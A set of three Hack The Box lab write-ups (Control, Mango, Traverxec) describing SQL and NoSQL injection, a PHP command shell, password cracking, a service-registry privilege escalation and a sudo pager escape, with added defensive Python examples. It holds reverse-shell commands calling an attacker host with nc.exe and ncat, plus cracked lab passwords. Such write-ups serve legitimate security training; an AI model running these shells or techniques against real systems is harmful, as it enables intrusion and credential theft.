Hack The Box - Control Writeup

System Summary



Initial Enumeration

Since it is a Windows box, let's start with enum4linux, but it gives no results:

So we turn to nmap:

Standard enumeration (rpcclient, smbclient, etc.) doesn't give any valuable result.

Connecting to MySQL/MariaDB is also not permitted.


So let's open the Web site...

There is an admin login page, or there should be, but a message states that a header is missing, and this header should be related to a proxy... Mmmh


Before firing up Burp, let's look through the page source of index.php:


The red lines look interesting.

So let's build our Burp Intruder setup like this:
- use the Sniper attack type
- add the Burp payload markers (§§) followed by : 192.168.4.28
- put only the proxy-related header names in the payload list (each one will substitute the markers)



And then start the attack with results:

It seems that by adding a custom header like X-Forwarded-For: 192.168.4.29 to the request, the web server replies with the full page instead of an error message.

Now we should add this header to every request sent by our browser. We can do it with the Burp Proxy options:

And we can get to the admin URL:

This page has many sub-links that are reached through POST requests.

Keep in mind that all requests must go through Burp, which adds the custom X-Forwarded-For header.
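The weakness behind this bypass is an access check that reads X-Forwarded-For straight from the client's request. The following is an added example, not code from the box or the writeup: a simplified Python check modelled on that behaviour beside a hardened version that only honours the header when the TCP peer is a known reverse proxy. The networks, proxy address and function names are assumptions.

```python
# Added example: client-controlled X-Forwarded-For as an access control,
# and the hardened form. Headers are a plain dict; addresses are constructed.
from ipaddress import ip_address, ip_network

INTERNAL_NET = ip_network("192.168.4.0/24")   # constructed: network the admin page expects
TRUSTED_PROXIES = {ip_address("10.0.0.5")}    # constructed: the only real reverse proxy


def vulnerable_is_internal(headers: dict) -> bool:
    """Like the admin page on the box: the source address comes from a header
    the client can set, so anyone can claim to be on the internal network."""
    xff = headers.get("X-Forwarded-For")
    if xff is None:
        return False                       # the "header missing" error the page shows
    return ip_address(xff.split(",")[0].strip()) in INTERNAL_NET


def hardened_is_internal(headers: dict, remote_addr: str) -> bool:
    """Only trust X-Forwarded-For when the immediate peer is a trusted proxy,
    and then use the rightmost entry (the address that proxy appended)."""
    peer = ip_address(remote_addr)
    xff = headers.get("X-Forwarded-For")
    if peer in TRUSTED_PROXIES and xff:
        client = ip_address(xff.split(",")[-1].strip())
    else:
        client = peer                      # header from a non-proxy is ignored
    return client in INTERNAL_NET
```

A direct client that spoofs the header passes the first check but not the second; a request that really came through the proxy still works.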

Initial Foothold

The pages that we can test for SQL injection are the following:
  • search_products.php
  • view_product.php
  • update_product.php
  • delete_product.php
  • create_product.php
  • create_category.php
  • update_category.php
  • delete_category.php
All the POSTs have a number of parameters, so let's go to Burp Proxy and save each request into a separate file.
Then we can feed each file to sqlmap with the -r option.

After trying them, it seems that search_products.php is prone to SQL injection,
and it looks like a pretty straightforward ' UNION injection.

We can discover the table names with a query like:


With this injection:

we get three users (root, manager and hector) and three hashes.
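To make the search_products.php finding concrete, here is an added example that is not the box's code: a search handler that splices the search term into the SQL text, which is what lets a ' UNION payload pull rows from an unrelated table, beside the parameterised form. It uses an in-memory SQLite database with constructed table names and data, since the real schema is not on the page.

```python
# Added example: string-built search query vs a parameterised one.
# Schema and rows are constructed for the demo; they are not the box's data.
import sqlite3


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE product(id INTEGER, name TEXT);
        INSERT INTO product VALUES (1, 'Widget'), (2, 'Gadget');
        CREATE TABLE user(username TEXT, pwhash TEXT);
        INSERT INTO user VALUES ('hector', 'CONSTRUCTED_HASH');
    """)
    return con


def search_vulnerable(con: sqlite3.Connection, term: str) -> list:
    # The user-controlled term becomes part of the SQL statement itself,
    # so a quote in it ends the string and the rest is parsed as SQL.
    sql = "SELECT id, name FROM product WHERE name LIKE '%" + term + "%'"
    return con.execute(sql).fetchall()


def search_safe(con: sqlite3.Connection, term: str) -> list:
    # The term is bound as a parameter: it can only ever be compared as data.
    sql = "SELECT id, name FROM product WHERE name LIKE ?"
    return con.execute(sql, ("%" + term + "%",)).fetchall()


# The ' UNION pattern the writeup describes; the SELECT must return as many
# columns as the original query (two here) and the comment drops the rest.
UNION_TERM = "' UNION SELECT username, pwhash FROM user -- "
```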


One of the hashes can be cracked with hashcat and rockyou:

This should be the password for hector: l33th4x0rhector

But it doesn't seem to work with the usual tools like rpcclient, smbclient, WinRM...

So let's follow another path...

Why not upload a crafted PHP file to c:\inetpub\wwwroot?

This can then be called with a cmd argument to execute commands (below, the result of the command dir):

With this PHP "helper" we can execute arbitrary commands like:

  • create c:\temp
  • xcopy nc.exe from a remote share
  • execute this nc to open a reverse shell






So we now have a shell as iusr (the user running the IIS service), which has low privileges.


User Flag

If we look in c:\users\ we find a home folder for user hector, and we have a password l33th4x0rhector from the previous SQL injection.

The next and obvious step is to run a shell as hector using his credentials, but it's not that easy.
Direct commands such as "runas" and "psexec" require interaction or don't work properly: we have to use PowerShell.

Let's open another listener on our local computer (10.10.16.78) on port 5555.

Then open PowerShell on the Control box and run this sequence of commands:

$pass = ConvertTo-SecureString "l33th4x0rhector" -AsPlainText -Force

$Creds = New-Object  System.Management.Automation.PSCredential("Fidelity\Hector",$pass)

Invoke-Command -Computer Fidelity -Credential $Creds -ScriptBlock { cmd.exe "/c C:\temp\nc.exe -e c:\windows\system32\cmd.exe 10.10.16.78 5555" }

We then receive a shell as hector and can get the user flag.


Root Flag

We're now in as hector and we can get his group membership:

Nothing interesting, AFAIK.

After some digging in the system I came across the powershell history located in C:\users\hector\appdata\Roaming\microsoft\Windows\Powershell\PSReadline\

There are two hints related to the registry section of the Windows services:


Indeed Hector has "Full Control" access to that part of the registry.


This means that hector can change the configuration of services.

We have to look for services that execute an .exe file other than svchost (we don't want to mess with it),
with some PowerShell commands like:

Get-Item HKLM:\SYSTEM\CurrentControlSet\services\* 2>$null |
  Get-ItemProperty -Name "ImagePath" 2>$null |
  Select-Object -Property PSChildName, ImagePath |
  Where-Object { $_.ImagePath -like "*.exe*" } |
  Where-Object { $_.ImagePath -notlike "*svchost.exe*" } |
  Format-Table

  • PSChildName is important because we use it to reference the service in sc.exe
  • ImagePath is important because it's the path of the executable that the service runs.

These properties are already filtered to show only services that have an executable ImagePath, excluding svchost.exe because we don't want to mess up the system.



By extracting the first column (the name of the service) we can use "sc.exe query" to test which services hector has access to (manually or scripted).

It turns out that hector gets access denied for most services, except for a few (AppVClient, EFS, MSDTC, RSoPProv, sppsvc...).


We can therefore choose one of these services and see its running state:



We can use the PowerShell command get-item to get the full configuration of the EFS service (there is a reason I chose EFS, see later).
When it is started it runs lsass.exe.

We can change the ImagePath to a value that is more useful for us, like a netcat shell on port 6666:

set-itemproperty -Path "HKLM:\SYSTEM\CurrentControlSet\services\EFS" -Name "ImagePath" -Value "c:\temp\ncat.exe 10.10.16.78 6666 -e c:\windows\system32\cmd.exe"

And then check that the setup has changed with the get-item command:

I chose EFS after some testing: some other services were already running (not willing to mess with them), others had a windows security protection: I was able to change their ImagePath, but as soon as I started them Windows terminated them immediately with an
"Error 577: Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a filed that was signed incorrectly or damaged, or that might be malicious software from an unknown source."

Luckily EFS is not affected by this "signing protection".

Now it's time to open a listener on port 6666 on our local machine.

Start the EFS service with:

If everything goes well, we should get back a shell as "NT authority\system" and get the root flag:




Hack The Box - Mango Writeup

System Summary



Initial Enumeration


The nmap scan shows that there are only SSH, HTTP and HTTPS ports open.

Connecting to the website over HTTPS we get an SSL certificate warning: the certificate discloses the hostname staging-order.mango.htb

Adding the hostname to our hosts file we can connect, and we see a login form.


Brute forcing gives no valuable result.
We also tried sqlmap for injection, but it did not seem vulnerable.

We can then check for other backend databases and, since the name of the box is Mango, MongoDB looks like a good candidate.

Initial foothold

The injection in MongoDB is explained here

The basic idea is to subvert the parameters passed in the request: instead of numeric or string values we pass objects, like arrays.
In the standard POST request we normally pass three parameters:
username=admin&password=pass&login=login

Think what happens if we pass something different, like
username=admin&password[$regex]=something&login=login
where "something" is a valid regular expression: the application will behave differently depending on whether it matches.

Let's use a ".*" regex (Burp Repeater is very helpful) and see:


We get an HTTP 302 reply.

Now use "A.*" as the regex:

And we get an HTTP 200.

What's the difference?
  • .* will match any password
  • A.* will only match a password that starts with A

So the 302 reply can be used as an oracle to find the password, by repeating the POST request with different values.
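Why password[$regex] reaches the database at all comes down to how bracketed form keys are parsed into objects. The following is an added example, not the box's or the writeup's code: a minimal parser that nests key[sub]=value the way common web frameworks do, a filter builder that passes the parsed value straight to the query (vulnerable) next to one that accepts only strings, and a tiny matcher standing in for MongoDB's equality and $regex behaviour. The function names and the sample document are constructed.

```python
# Added example: bracketed form keys become query operators, and the fix.
import re
from urllib.parse import parse_qsl


def parse_body(body: str) -> dict:
    """Parse a urlencoded body like qs/body-parser: key[sub]=v becomes a dict."""
    out: dict = {}
    for key, value in parse_qsl(body):
        if key.endswith("]") and "[" in key:
            base, sub = key[:-1].split("[", 1)
            out.setdefault(base, {})[sub] = value
        else:
            out[key] = value
    return out


def build_filter_vulnerable(form: dict) -> dict:
    # Whatever the client sent (string or operator object) goes into the query.
    return {"username": form["username"], "password": form["password"]}


def build_filter_safe(form: dict) -> dict:
    # Only scalar strings are accepted, so no {"$regex": ...} object can reach Mongo.
    for field in ("username", "password"):
        if not isinstance(form.get(field), str):
            raise ValueError(f"{field} must be a string")
    return {"username": form["username"], "password": form["password"]}


def mongo_like_match(doc: dict, flt: dict) -> bool:
    """Stand-in for the server's matching: equality, or $regex via re.search."""
    for field, cond in flt.items():
        if isinstance(cond, dict):
            if "$regex" not in cond or not re.search(cond["$regex"], doc[field]):
                return False
        elif doc[field] != cond:
            return False
    return True


# Constructed sample document, not the box's real credential.
SAMPLE_DOC = {"username": "admin", "password": "t0yPassw0rd"}
```

With the vulnerable builder, a regex that matches the stored password logs in (the 302 on the page) while one that does not gets the 200; with the safe builder the same body is rejected before any query runs.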

For this phase we can choose either to script it or to use the Burp Intruder module.
We'll proceed with Burp Intruder:
  • attack type is Sniper
  • payload is brute force with length 1
  • character set: the whole alphabet



The attack result is this one:
We see that we can find the characters that match, that is: {c, t, 0, 2, 3, 9}
With a similar approach we test capital letters and find {B, K, S}
Also special characters, and we find {!, #, $, ^, >, \, .}

An important note here is that some special characters have a special meaning in regex ($ \ . ^), so we may have found some false positives:

  • ^ is start of line
  • $ is end of line
  • . is "any character"
  • \ is the escape symbol

They can be matched in the regex, but only by escaping them with a prepended \.
The best option is to exclude them from the alphabet and check for them separately.

Now we have the components of the password {c, t, 0, 2, 3, 9, B, K, S, !, #, >} but we don't know their order.

The regex to check the first character is:


username=admin&password[$regex]=^§§.*&login=login

  • ^ means start of line
  • §§ is the Burp payload
  • .* is the remaining part of the password



We have this result:

So (discarding the space) we should have only one "302" reply, which corresponds to the character t.
The first character of the password is therefore t.

The next attack string is now (note the added t as first character):


username=admin&password[$regex]=^t§§.*&login=login
And we get:
So the second character of the password is 9.
The next attack string is:
username=admin&password[$regex]=^t9§§.*&login=login

Looping this attack we get the password of admin: t9KcS3>!0B#2

Using the same approach on the username we can discover an additional user and password:

  • User: mango
  • Password: h3mXK8RhU~f{]f5H
In this case escaping may be needed in the attacking regexp, like (note the backslash):
username=admin&password[$regex]=^h3mXK8rhU\§§.*&login=login

With SSH we find that user mango is valid and we have initial access.


User Flag

As user mango there is no user flag, but the passwd file shows an admin user.
We can su and get the flag:


Root flag


Using standard enumeration tools (LinEnum or similar) we can find a SUID file named jjs which is part of the Java package.

This can be used to execute inline scripts, and it can be used to read files, execute files, etc., as explained here: https://gtfobins.github.io/gtfobins/jjs/

We can steal the root flag by reading its content:

Where the numbers are the decimal ASCII codes of the characters (56 -> 8, 97 -> a, etc.)

The root flag is then 8a8ef79a7a2fbb01ea81688424e9ab15


it is an interactive interpreter that can be used to

Hack The Box - Traverxec Writeup

System Summary


Initial Foothold

An initial scan reveals the ssh and http ports open.

The web server is not the usual Apache, IIS or nginx but Nostromo 1.9.6.
There is a publicly disclosed RCE (CVE-2019-16278) that is already included in the Metasploit framework (multi/http/Nostromo_code_exec) and it's really easy to run it:

So we're in as the www-data user.




User Escalation

Looking for some juicy files we can easily find the Nostromo config with an htpasswd file:


Now cracking it with john and rockyou (it takes a few minutes):


The password is Nowonly4me but it doesn't work for ssh or su: it's definitely a rabbit hole...

The next step is to look for the user folders (http://10.10.10.165/~david) but it seems that there is an index.html and no directory listing.





But there is also a last line with a public folder named "public_www".
So let's try to look for it in David's home:


The backup file is quite interesting and I transferred it to my local machine with netcat (I didn't want to copy it in /tmp and leave it for other people 😊).
From the tgz file we can get David's .ssh folder with an id_rsa.
Let's convert and unlock it using ssh2john, john and rockyou.txt



The passphrase of the ssh key is hunter and we can use it to connect as user david and get the user flag.


Root escalation

Looking at David's home there is an interesting folder named bin:


Now the server-stats.sh script contains a sudo command that executes without authentication:

An interesting behavior of sudo is that it executes a "pager" application when the terminal session is not able to show the full output of the command.
Usually it's the less command (or more, vi, or another, depending on some environment variables that are defined).
So if we resize the terminal to a window less than 5 lines high, sudo will show the output with less.
And this less command will be executed as root.
In that less session we can execute commands by using ! followed by the command.

Let's resize the window and then run the sudo command:



The output is longer than the window height.
Execution will stop and show the output inside a less session:

We can then run any command by using the command mode of less with !bin/bash


And now:


So the root flag is:    9aa36a6d76f785dfd320a478f6e0d906